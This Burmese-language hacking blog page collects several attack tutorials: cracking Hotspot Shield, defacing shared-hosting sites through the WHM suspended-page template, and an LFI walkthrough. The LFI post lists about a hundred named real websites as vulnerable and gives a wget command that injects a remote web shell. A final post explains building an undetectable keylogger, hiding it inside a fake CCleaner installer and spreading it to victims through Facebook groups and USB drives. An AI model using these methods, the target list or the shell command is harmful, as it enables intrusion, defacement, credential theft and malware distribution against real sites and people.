ခုျပမယ့္ နည္းေလးကေတာ့ hotspot shield တစ္ခု ကို tool ေတြ အသံုးမျပဳပဲ manually crack လုပ္တဲ့နည္းေလးပဲျဖစ္ပါတယ္။ crack လုပ္မထားရင္ သင့္ hotspot shield ဟာ ads ေတြ banners ေတြနဲ ့ မ်က္စိေနာက္ေလာက္ေအာင္ျဖစ္ေနပါလိမ့္မယ္။

အရင္ဦးဆံုး မိမိကြန္ပ်ဴတာထဲက ဒီ directory ကို သြားလိုက္ပါ။

C:\Windows\System32\drivers\etc\

 အဲ့ folder ထဲကမွ "hosts" ဆိုတဲ့ file ကို ရွာလုိက္ပါ။ ရွာလို ့ေတြ ့ရင္ အဲ့ file ကို Notepad ျဖင့္ဖြင့္ျပီး coding ေတြအားလံုးရဲ ့အဆံုးမွာ ေအာက္မွာ က်ေနာ္ေပးထားတဲ့ code ေတြကို ထပ္မံျဖည့္စြက္လိုက္ပါ။ မူရင္း code ေတြကို ဒီအတိုင္းပဲ ထားရမယ္ေနာ္...ထပ္ျဖည့္ယံုပဲ ျဖည့္မွာ

127.0.0.1 anchorfree.net
127.0.0.1 rss2search.com
127.0.0.1 techbrowsing.com
127.0.0.1 box.anchorfree.net
127.0.0.1 www.mefeedia.com
127.0.0.1 www.anchorfree.net
127.0.0.1 www.mefeedia.com
 ျဖည့္ျပီးရင္ save လုပ္လိုက္ပါ။

ဒီေနရာမွာ window xp နဲ ့ဆိုရင္ သိပ္ျပသနာမရွိဘူး error မျပပဲ save လုပ္သြားလိမ့္မယ္။
ဒါေပမယ့္ window 7 မွာ ဆိုရင္ေတာ့ security အရ save ေပးမလုပ္ပါဘူး ဒါ့ေၾကာင့္ bypass လုပ္ရပါလိမ့္မယ္
bypass လုပ္ဖို ့အတြက္ေတာ့
- "hosts" ဆိုတဲ့ file ကို right click ႏွိပ္ျပီး properties ကို သြားပါ။
- security tab က Edit ကို click လုပ္လိုက္ပါ။
- User ကို select လုပ္ျပီးေတာ့ "Full Control" ဆိုတာကို အမွန္ျခစ္ေလးေပးလိုက္ပါ။
ဒါဆိုရင္ေတာ့ window 7 မွာလဲ save လုပ္လို ့ရသြားမွာပါ။

ေနာက္တဆင့္အေနနဲ ့ Hotspot Shield မရွိေသးရင္ Download လုပ္ပါ။
password - PIPO
( ရွိျပီးသားဆို download လုပ္ဖို ့မလုိအပ္ပါဘူး )

rar ဖိုင္ကို extract လုပ္ျပီးေတာ့ HSS-2.06-install-p41-290-conduit.exe ကို install လုပ္လိုက္ပါ။
install လုပ္ျပီးရင္ Reboot တစ္ခါျပန္ခ်ပါ။

ေနာက္တဆင့္အေနနဲ ့ HSS-2.55-install-elite-395-conduit.exe ကို install လုပ္ျပီး Reboot ေနာက္တစ္ခါ ျပန္ခ်ေပးပါ။

ဒါဆိုရင္ေတာ့ သင့္ hotspot shield ဟာ ads ေတြ banners ေတြမပါေတာ့ပဲနဲ ့ crack ျပီးသားျဖစ္သြားပါျပီ။


Read more


How to Deface Cgi-suspended pages





ဒီနည္းေလးက အဆင့္ရွိတဲ့နည္းေလးတစ္ခုေတာ့မဟုတ္ပါဘူး ၾဆာသမားေတြ အတြက္ေတာ့ ကေလးအထာေလးေတြပါ။
ဒါေပမယ့္ Hacking ကို ေလ့လာကာစ လူေတြအတြက္ေတာ့ နည္းနည္း အထင္ၾကီးေလာက္စရာရွိတယ္

Cgi-suspended pages ဆိုတာ Host ကေန ျဖဳတ္ခ်ခံထားရတဲ့ site pages ေတြကို ေျပာတာျဖစ္ပါတယ္
Attacker အေနနဲ ့ template ကို edit လုပ္ျခင္းျဖင့္ defacing လုပ္ႏုိင္ပါတယ္

သူ ့မွာ အားသာခ်က္တစ္ခု ရွိပါတယ္ အဲ့ဒါကေတာ့ Server တစ္ခုထဲက site တစ္ခု ဟာ suspended ျဖစ္ေနျပီဆိုရင္ အဲ့ Cgi-suspended pages ရဲ ့template ကို edit လုပ္ျပီး deface code ကို ထည့္ျပီးတဲ ့အခါ အဲ့ server ထဲမွာ ရွိတဲ ့အျခား site page ေတြရဲ ့ေနာက္မွာ /cgi-sys/suspendedpage.cgi  ျဖည့္လိုက္တာနဲ ့site တစ္ခုျခင္းဆီကို deface လုပ္စရာမလိုပဲနဲ ့ deface ကိုေတြ ့ရမွာျဖစ္ပါတယ္

ဥပမာ www.blarblarblar.com နဲ ့ www.dardardar.com တို ့ဟာ Server တစ္ခုတည္းမွာ ရွိေနတဲ့ site ေတြျဖစ္ျပီး အဲ့ Cgi-suspended page template ကို edit လုပ္ျပီး deface code ထည့္ထားမယ္ဆိုရင္ www.dardardar.com တို ့www.blarblarblar.com တို ့ ရဲ ့ေနာက္မွာ /cgi-sys/suspendedpage.cgi လို ့ျဖည့္လိုက္တာနဲ ့အဲ့ site address နဲ ့deface ကို ေတြ ့ရမွာျဖစ္ပါတယ္ ... မ်က္လွည့္ျပၾကည့္တာ ဘာမွ မဟုတ္ဘူးေနာ္....


အဲ့ဒီအတြက္ WHM panel တစ္ခုလိုအပ္ျပီး account ရွိရပါမယ္။
WHM panel ကေန login ၀င္ျပီးသြားရင္ေတာ့

Account Functions >> Web Template Editor  ကို သြားလိုက္ပါ။



Web Template Editor ဖြင့္ျပီးသြားရင္ အဲ့ထဲက Account Suspended ဆိုတာကို click လုပ္လိုက္ရင္ ေအာက္မွာ ျပထားတဲ့ ပံုထဲကလို coding ေတြေတြ ့ရပါလိမ့္မယ္။
ဒါဆိုရင္ေတာ့ မိမိရဲ ့ deface code ကို ေျပာင္းျဖည့္လိုက္ျပီး ရင္ save လုပ္လုိက္ပါ။

အဲ့ဒါဆိုရင္ေတာ့ အဲ့ Server ေအာက္မွာရွိေနတဲ့ Site ေတြအားလံုးကို deface လုပ္စရာမလိုပဲနဲ ့ /cgi-sys/suspendedpage.cgi လို ့ျဖည့္လိုက္တာနဲ ့ ကိုယ့္ရဲ ့ deface ကိုေတြ ့ရမွာျဖစ္ပါတယ္။

Read more


Shell Upload using LFI method


Local File Inclusion Vulnerability ကို အသံုးခ်ျပီး Shell upload လုပ္ဖို ့အတြက္ common parameter အခ်ိဳ ့ကို သိထားဖို ့လိုအပ္ပါတယ္။

index.php?homepage=
index.php?page=
index.php?index2=

LFI နဲ ့ Shell upload လုပ္ဖို ့အတြက္ လိုအပ္တာေတြကေတာ့

၁။ Vulnerable Website
၂။ Shell
၃။ User-Agent Switcher ( Download )
၄။ Mozilla FireFox


ကြ်န္ေတာ့္ဆီမွာ ရွိေနတဲ vulnerable site ေတြကေတာ့

http://kyengerarotaryclub.org/index.php?page=/etc/passwd
http://www.crsfsite.net/main/index.php?page=/etc/passwd
http://modelspromo.com/index.php?page=/etc/passwd
http://www.mrt.ac.lk/gavel/index.php?page=/etc/passwd
http://nyctradeprinting.com/index.php?page=/etc/passwd
http://www.dayborodistrict.com.au/index.php?page=/etc/passwd
http://schumpeter2011.econ.tuwien.ac.at/index.php?page=/etc/passwd
http://www.alinholding.com/index.php?page=/etc/passwd&page_title=home
http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd
http://lyantndc.cluster010.ovh.net/index.php?page=/etc/passwd
http://mspierphoto.com/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?site=1&page=/etc/passwd
http://www.sohnidharti.tv/main/Urdu/index.php?page=/etc/passwd
http://www.crsfsite.net/main/index.php?page=/etc/passwd
http://www.expo-ingenieurs.be/index.php?lang=FR&page=/etc/passwd
http://www.lovium.nl/index.php?page=/etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd
http://www.f-a-t.de/fat_v1/index.php?lang_id=2&page=/etc/passwd
http://www.jpistudios.com/redirect.php?page=../../../../../../etc/passwd
http://x17agency.com/redirect.php?page=../../../../../etc/passwd
http://www.winnerspizza.com/index.php?page=/etc/passwd
http://oregon-airsoft.com/index.php?page=/etc/passwd
http://www.eyesonmain.ca/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?page=/etc/passwd
http://www.rtscom.com/index.php?page=/etc/passwd
http://www.lavieillefrance.fr/index.php?page=/etc/passwd
http://www.evoca.ch/index.php?page=../etc/passwd
http://estaminetlille.fr/vieille/index.php?page=/etc/passwd
http://www.traildumont.be/index.php?page=/etc/passwd&album=12
http://www.speakingfromtheheartinc.com/index.php?page=/etc/passwd
http://www.moto-plus.net/index.php?Page=../../../../../etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.focusfloors.co.za/?page=../../../../etc/passwd
http://www.bushboats.co.za/index.php?page=../../../../etc/passwd
http://www.creteform.com/index.php?page=/etc/passwd&PHPSESSID=null
http://www.dreisingerfuneralhome.com/index.php?page=../../../../../etc/passwd
http://www.iceclub.biz/index.php?page=../../../../etc/passwd
http://www.daybororuralfire.com.au/index.php?page=/etc/passwd
http://www.spcstamps.com/index.php?page=/etc/passwd&back=null
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.tempelwelt.de/index.php?page=../../../../etc/passwd&PHPSESSID=null
http://www.mescreations.fr/index.php?page=../../../../etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd&Mode=MDP
http://www.scoberbernbach.de/index.php?page=/etc/passwd
http://lomejordehuelva.com/index.php?page=/etc/passwd
http://pomestam24.ru/index.php?page=/etc/passwd&option=login
http://www.kaltimmethanol.com/indo/index.php?page=/etc/passwd
http://winnerspizza.com/index.php?page=/etc/passwd
http://timslist.com/utechtube/index.php?page=/etc/passwd
http://www.fuw.edu.pl/~trawinski/index.php?page=/etc/passwd
http://www.memorial-odlozil.cz/odlozil/index.php?page=/etc/passwd
http://maxponomarenko.ru/index.php?page=/etc/passwd
http://shotgun.cc/index.php?page=/etc/passwd
http://www.fair-wohnen.de/index.php?page=../../../../../../etc/passwd
http://jhcs.eu/index.php?folder=Kontakt&page=../../../../../etc/passwd
http://www.rheuma-liga.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.hamann-lege.de/index.php?page=/etc/passwd
http://www.ulmer-verein.de/uv/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.lelo.biz/index.php?name=Kontakt&page=/etc/passwd&items=4
http://www.misbrugscenterherning.dk/index.php?page=../../../../../etc/passwd
http://www.wti-juelich.de/index.php?page=/etc/passwd
http://www.sekoro.seko-bayern.org/index.php?page=/etc/passwd
http://www.immobilieninvest.at/index.php?page=/etc/passwd&PHPSESSID=null
http://www.lc-bensberg-schloss.de/index.php?page=../../../../../../../../etc/passwd
http://www.ingolstadt.muetterzentren-bayern.de/index.php?page=/etc/passwd
http://www.tendokarate.no/index.php?page=/etc/passwd
http://www.mstechnical.pl/de/index.php?page=/etc/passwd
http://www.k-turm.de/index.php?page=/etc/passwd
http://wsc-skiextreme.wir-und-ich.de/index.php?page=../../../etc/passwd
http://www.seniorenbueros-bayern.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.bodyworld-schkeuditz.de/index.php?page=/etc/passwd
http://www.fortschrittwuerzburg.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.spielmannszug-ffw-oberkotzau.de/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.grabowscy.com/index.php?page=/etc/passwd
http://www.heilpraxis-geissdoerfer.de/index.php?page=/etc/passwd
http://www.selfclean.de/index.php?page=/etc/passwd
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.cncmodel.pl/eng/index.php?page=/etc/passwd
http://walk-in-the-park.de/index.php?page=/etc/passwd
http://www.k-tower.eu/index.php?page=/etc/passwd
http://dorfschuetzen.de.dedi926.your-server.de/index.php?page=/etc/passwd&PHPSESSID=null
http://www.ma2da.de/index.php?page=/etc/passwd
http://www.frauentreff-welden.de/index.php?page=/etc/passwd
http://etechnik-wichmann.de/index.php?page=../../../../etc/passwd
http://www.erotik-als-lebenskraft.de/index.php?page=/etc/passwd
http://84388.webhosting28.1blu.de/huchbaumanagement/index.php?page=/etc/passwd
http://www.stotterer-selbsthilfe-regensburg.seko-bayern.org/index.php?page=/etc/passwd
http://www.muezeger.de/index.php?page=/etc/passwd
http://schlafapnoe.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.hctjstbk.cz/index.php?page=/etc/passwd
http://violetta-tradgard.se/index.php?page=/etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.osteoporose.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=kontaktmenu.php&page=/etc/passwd

ပထမဆံုးအေနနဲ ့LFI Vulnerable ရွိေနတဲ့ site ( အေပၚက List ထဲပါတဲ့ site ေတြတင္မကပါဘူး မိမိ ကိုယ္တိုင္ရွာေတြ ့ထားတဲ ့ site ေတြလည္း အသံုးျပဳလို ့ရပါတယ္ root access ရထားဖို ့ေတာ့လိုအပ္ပါတယ္ )
ရဲ ့ေနာက္မွာ /etc/passwd ဆိုတာကို ရိုက္ထည့္လိုက္ပါ။
ဒါဆိုရင္ေတာ့ root access ရေအာင္ လုပ္ဖို ့အတြက္ username & password ကို ေတာ့ရျပီ
Password ကို ဘယ္လို hash ျဖည္ရမယ္ root access ရေအာင္ ဘယ္လုိ လုပ္ရမလဲဆိုတာေတာ့ ကြ်န္ေတာ္ tutorial သပ္သပ္ ေရးခဲ့ျပီးျပီ လိုအပ္ရင္ ရွာဖတ္လိုက္ပါ။


 ေနာက္တဆင့္အေနနဲ ့ path ကို /proc/self/environ ဆိုတာကို ေျပာင္းလိုက္ပါ။ ကြ်န္ေတာ္ ဥပမာေပးထားတဲ့ site အရဆို ေအာက္ကပံုအတိုင္းျဖစ္လိမ့္မယ္။

အဲ့လို အထက္ကအတုိင္း /etc/passwd နဲ ့ /proc/self/environ ကို စစ္ၾကည့္လို ့ok တယ္ဆုိရင္ေတာ့
remote code execution လုပ္ဖို ့အတြက္  User-Agent Switcher ဆိုတဲ့ extension ကို အသံုးျပဳရပါမယ္။


User Agent ကို edit လုပ္ဖုိ ့နဲ ့ code ေတြ ေျပာင္းဖို ့အတြက္
ေအာက္မွာေဖာ္ျပထားတဲ ့ပံုေတြထဲကအတိုင္း step by step ျပဳလုပ္ေပးရမွာျဖစ္ပါတယ္။










အားလံုးျပီးသြားရင္ေတာ့ website ကို refresh လုပ္ျပီးေတာ့ Ctrl+F ကို ႏွိပ္ျပီး
"disable_functions" ဆိုတာကို search လုပ္ပါ။

disable_functions | no value | no value

 ဒါဆိုရင္ေတာ့ Shell တင္ဖို ့ ready ျဖစ္ေနပါျပီ





ေအာက္က command ကို သံုးျပီး shell upload လုပ္လို ့ရပါတယ္။


<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>


upload လုပ္ျပီး .php ဆိုျပီး နာမည္တစ္ခုနဲ ့ rename ျပန္လုပ္ဖို ့လိုပါတယ္။

 shell ကို upload လုပ္ျပီးသြားရင္ေတာ့ ေအာက္က ပံုအတိုင္း ျမင္ေတြ ့ရမွာျဖစ္ပါတယ္။


ဒါဆိုရင္ေတာ့ သင့္လက္ထဲ အဲ့ ဒီ site ေရာက္သြားပါျပီ။
index.php ကို ျပင္ျပီးေတာ့ သင့္ deface code ကို ထည့္ဖို ့အဆင္သင့္ပါပဲ။

(မွတ္ခ်က္။ ။ ကြ်န္ေတာ္သည္ black hat တစ္ေယာက္မဟုတ္သလို white hat တစ္ေယာက္လည္း မဟုတ္ပါဘူး အရွင္းဆံုးေျပာရရင္ "I am not Hacker, but i love Hacking".)


Read more


How to create & spread Keylogger

ဒီပိုစ့္မွာေတာ့ Virus Total  လို ဆိုဒ္ မ်ိဳးကေတာ့င္ detect မလုပ္ ေပးႏုိင္တဲ့ keylogger တစ္ခု ဘယ္လို ဖန္တီးမလဲဆိုတာကို အဆင့္ဆင့္ ရွင္းလင္းျပသေပးသြားပါမယ္။

လုပ္ေဆာင္ရမယ့္ အဆင့္ေတြကေတာ့

၁။ Hack မယ့္ password ေတြကို သိမ္းဆည္းဖို ့ server တစ္ခု ေထာင္ရပါမယ္။
၂။ keylogger ထည့္သြင္းအသံုးျပဳမယ့္ any software တစ္ခုခု ရဲ ့ icon ကို extrect လုပ္ရပါမယ္။
၃။ keylogger ကို ဖြက္ဖို ့အတြက္ binding လုပ္ရပါမယ္။
၄။ ေနာက္ဆံုးအဆင့္အေနနဲ ့keylogger ကို victim ဆီကို spread လုပ္ရပါမယ္။


၁။ Hack မယ့္ password ေတြကို သိမ္းဆည္းဖို ့server


ပထမဆံုးအဆင့္အေနနဲ ့account password တစ္ခုကို hack လုပ္ဖို ့အတြက္ victim ရဲ ့ PC က keystrokes ေတြကို  သိမ္းဆည္းဖို ့server တစ္ခု လိုအပ္ပါတယ္။
keylogger server တစ္ခုေထာင္ဖို ့အတြက္ အဆင့္ဆင့္လုပ္ရမယ့္ အခ်က္ေတြကေတာ့

- Keylogger ကို ဒီကေန download လုပ္ပါ။
- Binding လုပ္ဖို ့Binder ကို ဒီမွာ download လုပ္ပါ။
- rar ဖိုင္ေတြကို extract လုပ္လိုက္တဲ့အခါမွာ folder တစ္ခုနဲ ့file သံုးခုေတြ ့ရပါလိမ့္မယ္
- ျပီးရင္ေတာ့ keylogger ဆုိတဲ့ ဖိုင္ကို ဖြင့္လိုက္ပါ။ ဒီအဆင့္မွာေတာ့ gmail ID နဲ ့ password ေတာင္းပါလိမ့္မယ္။ ဒါေပမယ့္ အဲ့အတြက္ လိုအပ္တဲ့ gmail ကို သပ္သပ္ဖြင့္ပါ။ မိမိ အသံုးျပဳေနတဲ့ mail account ေတြကို အသံုးမျပဳပါနွင့္။ 
- server setting ထဲမွာ ေတာ့ victim's keystrokes report ေတြကို အခ်ိန္ ဘယ္ေလာက္ျခားျပီးမွ လက္ခံမလဲဆိုတာကို ေရြးျခယ္ေပးရပါမယ္။ ကြ်န္ေတာ့အေနနဲ ့ကေတာ့ timer ကို မိနစ္ ၂၀ ေလာက္ေပးေစခ်င္ပါတယ္။
- output  box ထဲမွာေတာ့ keylogger ပါတဲ့ ဖိုင္ရဲ ့location နဲ ့အသံုးျပဳမယ့္ file name ကို ျဖည့္ေပးရပါမယ္။ ဒီေနရာမွာ system ထဲက process name ေတြကို ေရြးျခယ္ အသံုးျပဳေစခ်င္ပါတယ္ ဥပမာ svchost လုိ ဖိုင္နာမည္မ်ိဳးကို သံုးပါ။ ဒါမွ detect လုပ္ဖို ့ခက္ခဲသြားေစမွာျဖစ္ပါတယ္။
- Log & Result Setting ထဲက EMail title ထဲမွာေတာ့ MyKeylogger report ဒါမွမဟုတ္ report လုိ ့နာမည္ေပးလိုက္ပါ။ ေနာက္ထပ္ option ၂ ခုထဲမွာေတာ့ computer name တို ့ victim name တို ့ကို အဆင္ေျပရာ တစ္ခုခု ျဖည့္စြက္လိုက္ပါ။
- Other Option ထဲမွာေတာ့ လုပ္စရာက တစ္ခုတည္းရွိပါတယ္။ အဲ့ဒါကေတာ့ warning message Pop up ကို unclick လုပ္ေပးရပါမယ္။ ဒါမွ တစ္ျခား keylogger ကို အုပ္မယ့္ software နဲ ့bind လုပ္ျပီးတဲ့အခါမွာ victim က keylogger မွန္ မရိပ္မိဖို ့ warning message မေပၚဖို ့က အေရးၾကီးပါတယ္။ 
- ဒါဆိုရင္ေတာ့ keylogger server ပိုင္းကေတာ့ အဆင္သင့္ျဖစ္သြားပါျပီ။


၂။ keylogger ထည့္သြင္းအသံုးျပဳမယ့္ any software တစ္ခုခု ရဲ ့ icon ကို extrect လုပ္ဖို ့အတြက္


- Resource hacker folder ထဲက reshacker ဆိုတဲ့ file ကိုဖြင့္ပါ။
- Menu ထဲကို သြားျပီး setup file တစ္ခုခု ကို ဖြင့္လိုက္ပါ။ ဒီေနရာမွာ ကြ်န္ေတာ္ကေတာ့ CCleaner ထဲကို keylogger ထည့္သြင္း အသံုးျပဳပံုနဲ ့နမူနာေပးျပီးေဖာ္ျပေပးသြားမွာပါ။
ဒါေၾကာင့္ CCleaner ရဲ ့setup ဖိုင္ကို resource hacker ကေန ဖြင့္လိုက္ပါ။
- ဒါဆိုရင္ Menu ထဲမွာ action button တစ္ခုေပၚလာပါလိမ့္မယ္ အဲ့ button ကို click လုပ္ ျပီးရင္ save all resource ကိုပါ click ထပ္လုပ္လိုက္ပါ။
- ျပီးရင္ အဲ့ဒီ resource ေတြကို desktop သို ့မဟုတ္ တစ္ေနရာရာမွာ save လုပ္လုိက္ပါ။ 
- အဲ့လို save လုပ္လိုက္တဲ့အခါမွာ file ၂ ခုပါပါတယ္။ တစ္ခုက icon file နဲ ့ေနာက္တစ္ခုက res file
အဲ့ ၂ ခုထဲကမွ ကြ်န္ေတာ္တို ့လိုအပ္တာ icon file ပါပဲ တစ္ျခားတစ္ခုျဖစ္တဲ့ res file ကို delete လုပ္လုိက္လို ့ရပါတယ္ မလိုအပ္ပါဘူး။
- ဒီလိုဆုိရင္ေတာ့ keylogger ကို အုပ္ဖို ့အတြက္ CCleaner setup icon ေလးကို ရရွိျပီျဖစ္ပါတယ္။


 ၃။ keylogger ကို ဖြက္ဖို ့အတြက္ binding လုပ္မယ့္အဆင့္ေတြကေတာ့


- Keylogger folder ထဲက Binder ကို ဖြင့္လိုက္ပါ။
- (+) ဆိုတဲ့ button ေလးကို ႏွိပ္ျပီး ေအာက္ကဖိုင္ေတြကို add လုိက္ပါ။
keylogger server နဲ ့ CCleaner setup icon ဆိုတဲ့ file ၂ ခု ကို add လုပ္ရမွာျဖစ္ပါတယ္။
- Binder Menu ထဲက Setting ကိုသြားလိုက္ပါ။ အေပၚက အဆင့္မွာ add လုပ္ခဲ့တဲ ့icon နဲ ့ keylogger server ေထာင္တဲ့ step ေတြထဲမွာ ျဖည့္ခဲ့တဲ ့ output file ရဲ ့ location ကို ထည့္ပါ။
- Binder ထဲက files menu ကိုသြားျပီးေတာ့ Bind files ဆိုတာကုိ click လုပ္လိုက္ပါ။
- ဒါဆိုရင္ေတာ့ binding လုပ္ျပီးသား keylogger တစ္ခုက ready ျဖစ္သြားပါျပီ။ victim ဆီကို ျဖန္ ့ေပးဖို ့အဆင့္ပဲ က်န္ပါေတာ့တယ္။


၄။ keylogger ကို victim ဆီကို spread လုပ္ဖုိ ့အတြက္



- ခုဆိုရင္ ကြ်န္ေတာ္တို ့ဆီမွာ keylogger attach လုပ္ထားတဲ့ CCleaner setup file တစ္ခုရွိေနပါျပီ။
အဲ့ဒါကို ျဖန္ ့ဖို ့အတြက္ကေတာ့ ကြ်န္ေတာ္ အေထြအထူးရွင္းျပေနစရာမလို ေလာက္ဘူးလို ့ထင္ပါတယ္။
facebook group တစ္ခုခု သို ့မဟုတ္ fan page တစ္ခုခုကေန ေနာက္ဆံုးထြက္ CCleaner ဆိုျပီးေတာ့သာ တင္လိုက္ download လုပ္ၾကမယ့္သူေတြ အမ်ားၾကီးပါ။
- ေနာက္ျပီးေတာ့ flash drive ကေနတစ္ဆင့္လဲ CCleaner Setup file အျဖစ္ victim ရဲ ့ PC ထဲကို တုိက္ရိုက္ ထည့္ေပးျခင္းျဖင့္လဲ spread လုပ္လုိ ့ရပါတယ္။


ေနာက္ဆံုးအေနနဲ ့အဲ့လို keylogger မ်ိဳးကို ဘယ္လို ကာကြယ္ ရမလဲ ဆိုတာပါ တစ္ခါတည္း ရွင္ျပေပးသြားပါမယ္။

- creck လုပ္ထားတဲ့ software ေတြကို အသံုးမျပဳပါနွင့္။ unauthorized websites ေတြကေန download မဆြဲပါႏွင့္ ( official site က software ေတြပဲ အသံုးျပဳပါ )
- anti-virus နဲ ့anti-spyware ေတြကို အျမဲ update ျပဳလုပ္ေပးပါ။
- တစ္ျခား user ေတြက မိမိ PC ကို အသံုးျပဳျခင္းကို အတတ္ႏုိင္ဆံုး ေရွာင္ၾကင္ပါ။

 
 

Read more

Powered by Blogger.

About This Blog

Blogger Tips And Tricks|Latest Tips For Bloggers Free Backlinks

Respect List

Blink Hacker Group

Myanmar Hacker Uniteam

Brotherhood of Myanmar Hackers

and All Myanmar Attackers & All Myanmar Black Hats.

Popular Posts

Followers

Web hosting for webmasters